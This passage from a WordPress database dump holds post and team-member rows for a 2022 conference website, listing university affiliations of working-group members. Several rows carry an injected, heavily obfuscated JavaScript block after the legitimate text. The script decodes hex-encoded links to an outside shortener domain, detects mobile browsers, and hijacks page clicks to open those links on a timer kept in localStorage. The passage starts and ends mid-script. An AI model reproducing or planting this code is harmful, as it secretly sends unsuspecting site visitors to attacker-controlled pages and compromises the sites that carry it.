_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Semantics3D - Semantic Scene Analysis and 3D Reconstruction from Images and Image Sequences','','inherit','closed','closed','','2795-revision-v1','','','2022-10-14 17:40:22','2022-10-14 17:40:22','',2795,'https://gsw2023.com/?p=2846',0,'revision','',0),
(2847,1,'2022-10-14 17:44:16','2022-10-14 17:44:16','<!-- wp:paragraph -->\n<p>University of Tehran,</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Iran (WG IV/2)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Mahmoud Reza Delavar','','publish','closed','closed','','mahmoud-reza-delavar','','','2022-10-14 17:45:59','2022-10-14 17:45:59','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2847',0,'dt_team','',0),
(2848,1,'2022-10-14 17:44:10','2022-10-14 17:44:10','','w151','','inherit','open','closed','','w151','','','2022-10-14 17:44:10','2022-10-14 17:44:10','',2847,'https://gsw2023.com/wp-content/uploads/2022/10/w151.jpg',0,'attachment','image/jpeg',0),
(2849,1,'2022-10-14 17:45:09','2022-10-14 17:45:09','<!-- wp:paragraph -->\n<p>University of Twente,</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Netherlands (WG IV/2)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 